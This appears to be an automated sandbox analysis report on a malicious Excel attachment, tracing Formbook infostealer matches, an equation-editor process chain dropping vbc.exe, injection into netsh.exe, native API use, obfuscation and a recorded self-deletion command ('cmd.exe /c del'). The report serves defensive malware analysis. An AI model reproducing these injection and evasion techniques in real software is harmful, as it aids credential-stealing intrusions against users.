Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Contains functionality to shutdown / reboot the system
Source: C:\Users\Public\vbc.exe Code function: 4_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 4_2_004030FB
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_004047D3 4_2_004047D3
Source: C:\Users\Public\vbc.exe Code function: 4_2_004061D4 4_2_004061D4
Source: C:\Users\Public\vbc.exe Code function: 4_2_10008836 4_2_10008836
Source: C:\Users\Public\vbc.exe Code function: 4_2_10003D10 4_2_10003D10
Source: C:\Users\Public\vbc.exe Code function: 4_2_100110E1 4_2_100110E1
Source: C:\Users\Public\vbc.exe Code function: 4_2_1000F902 4_2_1000F902
Source: C:\Users\Public\vbc.exe Code function: 4_2_100119AC 4_2_100119AC
Source: C:\Users\Public\vbc.exe Code function: 4_2_100059B1 4_2_100059B1
Source: C:\Users\Public\vbc.exe Code function: 4_2_1001AA24 4_2_1001AA24
Source: C:\Users\Public\vbc.exe Code function: 4_2_1001AA33 4_2_1001AA33
Source: C:\Users\Public\vbc.exe Code function: 4_2_1000B23E 4_2_1000B23E
Source: C:\Users\Public\vbc.exe Code function: 4_2_1000FE74 4_2_1000FE74
Source: C:\Users\Public\vbc.exe Code function: 4_2_10005EA5 4_2_10005EA5
Source: C:\Users\Public\vbc.exe Code function: 4_2_100062BD 4_2_100062BD
Source: C:\Users\Public\vbc.exe Code function: 4_2_100066F2 4_2_100066F2
Source: C:\Users\Public\vbc.exe Code function: 4_2_10006B27 4_2_10006B27
Source: C:\Users\Public\vbc.exe Code function: 4_2_1000F390 4_2_1000F390
Source: C:\Users\Public\vbc.exe Code function: 5_2_00401026 5_2_00401026
Source: C:\Users\Public\vbc.exe Code function: 5_2_00401028 5_2_00401028
Source: C:\Users\Public\vbc.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B893 5_2_0041B893
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B896 5_2_0041B896
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C963 5_2_0041C963
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041D1F8 5_2_0041D1F8
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408C70 5_2_00408C70
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D87 5_2_00402D87
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041BF0D 5_2_0041BF0D
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091E0C6 5_2_0091E0C6
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094D005 5_2_0094D005
Source: C:\Users\Public\vbc.exe Code function: 5_2_0093905A 5_2_0093905A
Source: C:\Users\Public\vbc.exe Code function: 5_2_00923040 5_2_00923040
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091E2E9 5_2_0091E2E9
Source: C:\Users\Public\vbc.exe Code function: 5_2_009C1238 5_2_009C1238
Source: C:\Users\Public\vbc.exe Code function: 5_2_009463DB 5_2_009463DB
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091F3CF 5_2_0091F3CF
Source: C:\Users\Public\vbc.exe Code function: 5_2_00922305 5_2_00922305
Source: C:\Users\Public\vbc.exe Code function: 5_2_00927353 5_2_00927353
Source: C:\Users\Public\vbc.exe Code function: 5_2_0096A37B 5_2_0096A37B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00955485 5_2_00955485
Source: C:\Users\Public\vbc.exe Code function: 5_2_00931489 5_2_00931489
Source: C:\Users\Public\vbc.exe Code function: 5_2_0095D47D 5_2_0095D47D
Source: C:\Users\Public\vbc.exe Code function: 5_2_0093C5F0 5_2_0093C5F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0092351F 5_2_0092351F
Source: C:\Users\Public\vbc.exe Code function: 5_2_00924680 5_2_00924680
Source: C:\Users\Public\vbc.exe Code function: 5_2_0092E6C1 5_2_0092E6C1
Source: C:\Users\Public\vbc.exe Code function: 5_2_009C2622 5_2_009C2622
Source: C:\Users\Public\vbc.exe Code function: 5_2_009A579A 5_2_009A579A
Source: C:\Users\Public\vbc.exe Code function: 5_2_0092C7BC 5_2_0092C7BC
Source: C:\Users\Public\vbc.exe Code function: 5_2_009557C3 5_2_009557C3
Source: C:\Users\Public\vbc.exe Code function: 5_2_009BF8EE 5_2_009BF8EE
Source: C:\Users\Public\vbc.exe Code function: 5_2_0092C85C 5_2_0092C85C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094286D 5_2_0094286D
Source: C:\Users\Public\vbc.exe Code function: 5_2_009C098E 5_2_009C098E
Source: C:\Users\Public\vbc.exe Code function: 5_2_009229B2 5_2_009229B2
Source: C:\Users\Public\vbc.exe Code function: 5_2_009369FE 5_2_009369FE
Source: C:\Users\Public\vbc.exe Code function: 5_2_009A5955 5_2_009A5955
Source: C:\Users\Public\vbc.exe Code function: 5_2_009D3A83 5_2_009D3A83
Source: C:\Users\Public\vbc.exe Code function: 5_2_009CCBA4 5_2_009CCBA4
Source: C:\Users\Public\vbc.exe Code function: 5_2_009ADBDA 5_2_009ADBDA
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FBD7 5_2_0091FBD7
Source: C:\Users\Public\vbc.exe Code function: 5_2_00947B00 5_2_00947B00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C7E0C6 8_2_00C7E0C6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C83040 8_2_00C83040
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C9905A 8_2_00C9905A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CAD005 8_2_00CAD005
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C7E2E9 8_2_00C7E2E9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D21238 8_2_00D21238
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C7F3CF 8_2_00C7F3CF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CA63DB 8_2_00CA63DB
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C87353 8_2_00C87353
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CCA37B 8_2_00CCA37B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C82305 8_2_00C82305
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C91489 8_2_00C91489
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CB5485 8_2_00CB5485
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C9C5F0 8_2_00C9C5F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8351F 8_2_00C8351F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8E6C1 8_2_00C8E6C1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C84680 8_2_00C84680
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D22622 8_2_00D22622
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D0579A 8_2_00D0579A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8C7BC 8_2_00C8C7BC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D1F8EE 8_2_00D1F8EE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8C85C 8_2_00C8C85C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CA286D 8_2_00CA286D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C969FE 8_2_00C969FE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D2098E 8_2_00D2098E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C829B2 8_2_00C829B2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D05955 8_2_00D05955
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D33A83 8_2_00D33A83
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D0DBDA 8_2_00D0DBDA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C7FBD7 8_2_00C7FBD7
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D2CBA4 8_2_00D2CBA4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CA7B00 8_2_00CA7B00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D1FDDD 8_2_00D1FDDD
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8CD5B 8_2_00C8CD5B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CB0D3B 8_2_00CB0D3B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C9EE4C 8_2_00C9EE4C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C90F3F 8_2_00C90F3F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009B893 8_2_0009B893
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009B896 8_2_0009B896
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009C963 8_2_0009C963
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009D1E5 8_2_0009D1E5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00088C70 8_2_00088C70
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00082D87 8_2_00082D87
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00082D90 8_2_00082D90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00082FB0 8_2_00082FB0
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 0091DF5C appears 89 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00963F92 appears 73 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0091E2A8 appears 32 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0098F970 appears 71 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0096373B appears 185 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 00C7E2A8 appears 38 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 00CEF970 appears 77 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 00CC3F92 appears 99 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 00CC373B appears 237 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 00C7DF5C appears 101 times
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 5_2_004185B0 NtCreateFile, 5_2_004185B0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00418660 NtReadFile, 5_2_00418660
Source: C:\Users\Public\vbc.exe Code function: 5_2_004186E0 NtClose, 5_2_004186E0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00418790 NtAllocateVirtualMemory, 5_2_00418790
Source: C:\Users\Public\vbc.exe Code function: 5_2_009100C4 NtCreateFile,LdrInitializeThunk, 5_2_009100C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00910048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_00910048
Source: C:\Users\Public\vbc.exe Code function: 5_2_00910078 NtResumeThread,LdrInitializeThunk, 5_2_00910078
Source: C:\Users\Public\vbc.exe Code function: 5_2_009107AC NtCreateMutant,LdrInitializeThunk, 5_2_009107AC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090F9F0 NtClose,LdrInitializeThunk, 5_2_0090F9F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090F900 NtReadFile,LdrInitializeThunk, 5_2_0090F900
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_0090FAD0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_0090FAE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_0090FBB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_0090FB68
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_0090FC90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_0090FC60
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FD8C NtDelayExecution,LdrInitializeThunk, 5_2_0090FD8C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_0090FDC0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_0090FEA0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_0090FED0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FFB4 NtCreateSection,LdrInitializeThunk, 5_2_0090FFB4
Source: C:\Users\Public\vbc.exe Code function: 5_2_009110D0 NtOpenProcessToken, 5_2_009110D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00910060 NtQuerySection, 5_2_00910060
Source: C:\Users\Public\vbc.exe Code function: 5_2_009101D4 NtSetValueKey, 5_2_009101D4
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091010C NtOpenDirectoryObject, 5_2_0091010C
Source: C:\Users\Public\vbc.exe Code function: 5_2_00911148 NtOpenThread, 5_2_00911148
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090F8CC NtWaitForSingleObject, 5_2_0090F8CC
Source: C:\Users\Public\vbc.exe Code function: 5_2_00911930 NtSetContextThread, 5_2_00911930
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090F938 NtWriteFile, 5_2_0090F938
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FAB8 NtQueryValueKey, 5_2_0090FAB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FA20 NtQueryInformationFile, 5_2_0090FA20
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FA50 NtEnumerateValueKey, 5_2_0090FA50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FBE8 NtQueryVirtualMemory, 5_2_0090FBE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FB50 NtCreateKey, 5_2_0090FB50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FC30 NtOpenProcess, 5_2_0090FC30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C700C4 NtCreateFile,LdrInitializeThunk, 8_2_00C700C4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C707AC NtCreateMutant,LdrInitializeThunk, 8_2_00C707AC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6F9F0 NtClose,LdrInitializeThunk, 8_2_00C6F9F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6F900 NtReadFile,LdrInitializeThunk, 8_2_00C6F900
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FAE8 NtQueryInformationProcess,LdrInitializeThunk, 8_2_00C6FAE8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FBB8 NtQueryInformationToken,LdrInitializeThunk, 8_2_00C6FBB8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FB50 NtCreateKey,LdrInitializeThunk, 8_2_00C6FB50
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FB68 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_00C6FB68
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FC60 NtMapViewOfSection,LdrInitializeThunk, 8_2_00C6FC60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FDC0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_00C6FDC0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FD8C NtDelayExecution,LdrInitializeThunk, 8_2_00C6FD8C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_00C6FED0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FFB4 NtCreateSection,LdrInitializeThunk, 8_2_00C6FFB4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C710D0 NtOpenProcessToken, 8_2_00C710D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C70048 NtProtectVirtualMemory, 8_2_00C70048
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C70060 NtQuerySection, 8_2_00C70060
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C70078 NtResumeThread, 8_2_00C70078
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C701D4 NtSetValueKey, 8_2_00C701D4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C71148 NtOpenThread, 8_2_00C71148
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C7010C NtOpenDirectoryObject, 8_2_00C7010C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6F8CC NtWaitForSingleObject, 8_2_00C6F8CC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C71930 NtSetContextThread, 8_2_00C71930
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6F938 NtWriteFile, 8_2_00C6F938
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FAD0 NtAllocateVirtualMemory, 8_2_00C6FAD0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FAB8 NtQueryValueKey, 8_2_00C6FAB8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FA50 NtEnumerateValueKey, 8_2_00C6FA50
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FA20 NtQueryInformationFile, 8_2_00C6FA20
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FBE8 NtQueryVirtualMemory, 8_2_00C6FBE8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FC90 NtUnmapViewOfSection, 8_2_00C6FC90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C70C40 NtGetContextThread, 8_2_00C70C40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FC48 NtSetInformationFile, 8_2_00C6FC48
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FC30 NtOpenProcess, 8_2_00C6FC30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C71D80 NtSuspendThread, 8_2_00C71D80
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FD5C NtEnumerateKey, 8_2_00C6FD5C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FEA0 NtReadVirtualMemory, 8_2_00C6FEA0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FE24 NtWriteVirtualMemory, 8_2_00C6FE24
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FFFC NtCreateProcessEx, 8_2_00C6FFFC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FF34 NtQueueApcThread, 8_2_00C6FF34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_000985B0 NtCreateFile, 8_2_000985B0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00098660 NtReadFile, 8_2_00098660
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_000986E0 NtClose, 8_2_000986E0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe 2FFBB436257F6F348FADE42E94DF5737AB8B9D9848A220206992C52D917A7B5E
Source: Joe Sandbox View Dropped File: C:\Users\Public\vbc.exe 2FFBB436257F6F348FADE42E94DF5737AB8B9D9848A220206992C52D917A7B5E
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: Sajeeb09908976745344567.xlsx Virustotal: Detection: 29%
Source: Sajeeb09908976745344567.xlsx ReversingLabs: Detection: 21%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Sajeeb09908976745344567.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC30.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/15@2/2
Source: C:\Users\Public\vbc.exe Code function: 4_2_00402053 CoCreateInstance,MultiByteToWideChar, 4_2_00402053
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 4_2_00404292
Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: netsh.pdb source: vbc.exe, 00000005.00000002.556406324.0000000000553000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, netsh.exe

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\Public\vbc.exe Unpacked PE file: 5.2.vbc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_1000A505 push ecx; ret 4_2_1000A518
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B85C push eax; ret 5_2_0041B862
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C932 pushfd ; ret 5_2_0041C933
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041525A pushfd ; ret 5_2_0041525B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00416235 push 1D9B51BBh; retf 5_2_0041623A
Source: C:\Users\Public\vbc.exe Code function: 5_2_00415C87 push cs; iretd 5_2_00415C88
Source: C:\Users\Public\vbc.exe Code function: 5_2_0040AEB2 push ebp; retf 5_2_0040AEBC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B7F2 push eax; ret 5_2_0041B7F8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B7FB push eax; ret 5_2_0041B862
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B7A5 push eax; ret 5_2_0041B7F8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C7DFA1 push ecx; ret 8_2_00C7DFB4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009B85C push eax; ret 8_2_0009B862
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009C932 pushfd ; ret 8_2_0009C933
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00096235 push 1D9B51BBh; retf 8_2_0009623A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009525A pushfd ; ret 8_2_0009525B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00095C87 push cs; iretd 8_2_00095C88
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0008AEB2 push ebp; retf 8_2_0008AEBC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009B7A5 push eax; ret 8_2_0009B7F8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009B7FB push eax; ret 8_2_0009B862
